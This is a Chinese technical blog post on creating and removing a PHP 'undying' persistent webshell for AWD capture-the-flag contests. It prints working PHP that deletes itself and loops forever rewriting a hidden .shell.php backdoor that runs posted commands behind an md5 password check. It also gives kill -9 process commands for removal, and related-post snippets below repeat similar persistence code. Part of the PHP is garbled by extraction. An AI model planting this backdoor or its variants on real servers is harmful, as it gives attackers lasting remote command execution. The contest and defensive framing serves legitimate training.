渗透测试-不死马的创建和查杀

已于 2023-01-20 10:27:38 修改
阅读量2.3k 收藏 14
点赞数
分类专栏: 渗透测试 文章标签: 安全性测试 web安全 安全
于 2022-09-01 13:57:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/126638536
版权

不死马的创建和查杀

文章目录

0x00 创建

md5加密密码:

在这里插入图片描述

代码:

<?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.shell.php'; $code = '<?php if(md5($_GET["pass"])=="2591c98b70119fe624898b1e424b5e91"){@system($_POST[cmd]);} ?>';

while (1){
file_put_contents( f i l e , file, file,code);
}
?>

触发执行:
在这里插入图片描述

0x01 查看

权限:在这里插入图片描述
内容:在这里插入图片描述
执行:在这里插入图片描述

0x02 查杀

root用户角度的查杀:

1、杀掉进程

ps aux | grep www-data | awk ‘{print $2}’ | xargs kill -9
2、重启服务

重启web服务。

其他用户的查杀:

在awd中,ctf用户没有权限,不能重启服务,而且,以ctf的用户来杀进程和条件竞争也是不可行的。

(不死马会先创建,然后被删除,在创建到被删除的过程中会可利用。)

最简单的方式就是以www-data用户的角度通过杀进程来实现查杀。

1、杀掉进程:

<?php @system("ps -aux | grep www-data | awk '{print $2}' | xargs kill -9"); ?>

2、条件竞争:
不推荐,如果不死马中没有调用usleep()函数,进行延时的话,条件竞争是gg的。

炫彩@之星
关注
专栏目录
php不死马如何kill,awd攻防之kill 不死马
weixin_33278577的博客
03-22 1724
1.pwn题目题目预设条件:官方给了一个ctf用户给我们,并且用一个root权限的守护进程去监听一个给定的端口,并且会不断以test用户启动名为game的服务(题目)。ctf用户可以直接使用 su test 切换到test用户。这样一个环境可以用这样一条命令去完成:sudo socat tcp4-listen:2019,fork exec:"sudo -u test ./game"#注:后面的ga...
不死马php如何取证_干掉 PHP 不死马
weixin_39880621的博客
01-30 880
在 AWD 模式下经常碰到不死马, 不干掉的话就会一直被偷 flag, 很难受. 所以研究一下怎么干掉.什么是不死马先说一下什么是不死马, 比如这种12345678910set_time_limit(0);ignore_user_abort(1);unlink(__FILE__);while (1) {$content = "";file_put_contents(".shell.php", $c...
PHP不死马
最新发布
qq_50822277的博客
07-22 242
php不死马,下面只是基础不死马。可以根据自己要求自行更改和改进。缺点:重启服务,即可删除,但是灵活性高。
awd网络攻防赛常用的不死马,超强
10-30
以上是不死马的代码,pass=R_Hacker. 采用了md5加密。
关于PHP不死马的分析和总结
weixin_52501704的博客
10-16 1977
关于PHP不死马的分析和总结
linux基础知识
Chen_Sir____的博客
11-11 191
命令解析器: shell – unix操作系统 bash – Linux操作系统 本质:根据命令的名字,调用对应的可执行程序 Linux快捷键 date:时间 history:历史(ctrl+p=在历史记录中一条一条向上切换 ctrl+n=在历史记录中一条一条向下切换) 光标移动:往回=ctrl+b 往后=ctrl+f 行首=ctrl+a 行尾=ctrl+e 行中字符删除操作:光标前=ctrl+h 光标后=ctrl+d(光标后即光标覆盖的字符) 行中光标前所有字符操作:光标前=ctrl+u 自动填充命令:
ctf awd知识分享(常用命令,不死马,waf,文件监控)
2202_75361164的博客
10-28 1338
ctf awd知识分享(常用命令,不死马,waf,文件监控)
不死马php如何取证_awd的防御脚本以及查杀不死马测试
weixin_39682944的博客
01-12 1089
防御脚本github上的awd通防脚本三个。一个记录敏感请求,一个记录所有的东西。一个是waf,针对sql注入的。wafjk.phpwafjk.php是用来记录敏感操作的,可以自行修改pattern,增加更多的敏感函数,只要匹配到,就会记录下来敏感操作。首先我在index.php包含了include "wafjk.php";...
AWD-----监控&不死马&垃圾包&资源库
qi_SJQ_的博客
02-27 4289
1.知识: AWD规则: 2.防守-----流量监控-----实时获取访问数据包流量 利用 WEB 访问监控配合文件监控能实现 WEB 攻击分析及后门清除操作,确保写入后门操作失效,也能确保分析到无后门攻击漏洞的数据包便于后期利用 分析有后门或无后门的攻击行为数据包找到漏洞进行修复 分析到成功攻击的数据包进行自我利用,用来攻击其他队伍 安恒的awf部署比较麻烦,比赛时系统日志不太好用,因此用日志分析监控的脚本好,可以实时生成日志。 推荐项目:AWD_Hunter-master 3.攻击-----
渗透测试-木免杀的几种方式
MSB_WLAQ的博客
09-28 4650
前言 免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木免于被杀毒软件查杀的软件。它除了使病毒木免于被查杀外,还可以扩增病毒木的功能,改变病毒木的行为。免杀的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。免杀技术也并不是十恶不赦的,例如,在软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件认为是木病毒;一些安全领域中的部分安全检测产品,也会被杀毒软件误杀,这时就需要免杀技术来应对这些不稳定因素。 1、裸
webshell不死僵尸大
10-06
webshell不死僵尸大(去后门本人专用)
行业资料-交通装置-一种木查杀工具.zip
08-31
行业资料-交通装置-一种木查杀工具.zip
安全相关-病毒防治-trojan remover(木查杀) v6.zip
08-12
《全面了解Trojan Remover:木查杀利器》 在当今的数字世界中,网络安全是每个用户都必须关注的重要话题。尤其是对于个人电脑和企业网络而言,病毒、木等恶意软件的威胁无处不在。本文将详细介绍一款专注于木...
7.awd不死马权限维持及变种
山兔的博客
09-22 2578
不死马又叫内存,就是运行一段永远不退出的程序常驻在PHP进程里,无限执行。 不死马.php—>上传到server—>server执行文件—>server本地无限循环生成 (一句话.php) 不死马生成的一句话木可以自定义。 <?php ignore_user_abort(true); //函数设置于客户机断开后,不会终止脚本的执行 set_time_limit(0); //设置脚本的最大执行时间,0代表无限制 unlink(__FILE__); //删除文件本身
如何删除不死马
黑锤的博客
11-25 5261
当自己的服务器被别人上传了不死马,如何应对呢? 第一个方法就是,重启自己的服务,这样不死马就没有了,就不会再生成了,毕竟不死马是在内存当中的。 第二种方法就是用命令将在内存中的进程删除; kill -9 -1 这个命令可以杀掉当前用户下面的所有进程,当然就可以把不死马杀掉。 可以使用 ps aux 命令 列出所有进程,找到要杀掉的进程运用命令: kill pid 就可以了 可以使用...
p81 红蓝对抗-AWD 监控&不死马&垃圾包&资源库
weixin_43263566的博客
03-15 2882
p81 红蓝对抗-AWD 监控&不死马&垃圾包&资源库
不死马的利用与克制(基于条件竞争)及变种不死马
Welcome To Myon'Blog !
10-06 3266
不死马即内存,它会写进进程里,并且无限地在指定目录中生成木文件这里以PHP不死马为例上面代码即为最简单的不死马,其目的是创建一个名为".test.php"的PHP文件,该文件包含一个带有密码验证的后门,允许执行任意PHP代码。关于代码的详细解释:设置PHP脚本忽略用户中止连接,即使用户在浏览器中停止加载页面,脚本仍然会继续执行。设置脚本执行时间限制为0,意味着脚本可以无限期地运行,不会被PHP的执行时间限制所中断。
Windows权限维持之php不死马、映像劫持、策略组脚本
Longwaer
01-09 1293
通过学习掌握Windows权限维持手段,提升在个人知识小技巧,更快的知晓权限维持的作用性。
awd怎么运行python
11-06
在运行Python脚本时,我们可以使用AWD(也称为Auto Web Discovery)来轻松地启动和管理Python的Web应用程序。 首先,确保已经安装了Python解释器。在命令行窗口中,可以输入"python --version"来检查Python版本。如果未安装Python,则需要先下载并安装。 接下来,我们需要安装AWD库。可以使用pip命令来安装。在命令行窗口中输入"pip install awd",等待安装完成。 安装完成后,可以通过在命令行窗口中输入"awd init"来初始化AWD。这将在当前目录下创建一个awd.ini文件,其中包含必要的配置信息。 然后,可以创建一个Python脚本,用以编写我们的Web应用程序。例如,可以使用Flask框架来创建一个简单的Web应用程序。在脚本中,我们需要导入Flask库,并定义一个应用对象。可以指定路由和处理函数来处理不同的URL请求。 完成脚本编写后,可以使用"awd run"命令来运行我们的Web应用程序。这将自动启动一个本地服务器,并将Web应用程序绑定到指定的主机和端口上。 在浏览器中输入指定的主机和端口,就可以访问我们的Web应用程序了。例如,如果我们将应用绑定到localhost和5000端口上,可以在浏览器中输入"http://localhost:5000"来访问。 同时,AWD还提供了其他功能,例如自动重新加载和处理静态文件等。这些功能可以在awd.ini文件中进行配置。 总的来说,AWD可以帮助我们更方便地运行和管理Python的Web应用程序,使得开发过程更加高效和便捷。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值